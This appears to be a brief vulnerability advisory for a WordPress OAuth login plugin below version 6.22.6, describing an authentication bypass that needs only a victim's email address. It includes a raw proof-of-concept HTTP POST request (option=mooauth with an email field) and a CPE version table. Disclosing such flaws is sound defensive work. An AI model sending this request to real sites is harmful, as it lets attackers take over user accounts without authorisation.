The plugin doesn’t validate that OAuth access token requests are legitimate, which allows attackers to log onto the site with the only knowledge of a user’s email address.
POST / HTTP/1.1 Accept: / Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 40 Connection: close option=mooauth&email;[email protected]
CPE | Name | Operator | Version |
---|---|---|---|
miniorange-login-with-eve-online-google-facebook | lt | 6.22.6 |